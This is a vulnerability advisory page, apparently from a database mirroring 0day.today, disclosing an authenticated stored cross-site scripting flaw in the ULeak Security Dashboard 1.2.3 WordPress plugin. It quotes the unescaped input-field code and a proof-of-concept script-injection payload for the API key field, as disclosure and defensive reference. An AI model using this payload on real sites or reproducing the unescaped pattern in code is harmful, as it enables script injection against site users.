Lucene search
K

WordPress Uleak Security Dashboard 1.2.3 Cross Site Scripting Vulnerability

🗓️ 01 Apr 2022 00:00:00Reported by Hassan Khan YusufzaiType 
zdt
 zdt
🔗 0day.today👁 253 Views

WordPress Uleak Security Dashboard 1.2.3 Cross Site Scripting Vulnerability. Stored XSS vulnerability in ULeak API Key field

Code
# Exploit Title: WordPress Plugin uleak-security-dashboard 1.2.3 - Stored Cross-Site Scripting (Authenticated)
# Date: 31-03-2022
# Exploit Author: Hassan Khan Yusufzai - Splint3r7
# Vendor Homepage: https://wordpress.org/plugins/uleak-security-dashboard/ <https://wordpress.org/plugins/amministrazione-aperta/>
# Version: 1.2.3
# Tested on: Firefox
# Contact me: h [at] spidersilk.com

# Vulnerable Code:

```
<th scope="row"><label>ULeak API Key*: </label></th>
<td><input type="text" name="ul_apikey" placeholder="XXXXXXXXXXX"
value="'.$user['apikey'].'"><span class="description">(Insert your ULeak
API Key. Find your Credentials in your profil settings <a target="_blank"
href="https://uleak.de/profil">here</a>)</span></td>
```

# POC

1) Install uleak-security-dashboard WordPress Plugin
2) Naviagete to http://localhost/wp-admin/tools.php?page=uleak
3) Inject payload ```"><script>alert(1)</script>```
in *ULeak API Key*: *filed.
4) XSS will trigger.

# POC Image

https://prnt.sc/D7sq6IlNtNaf

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation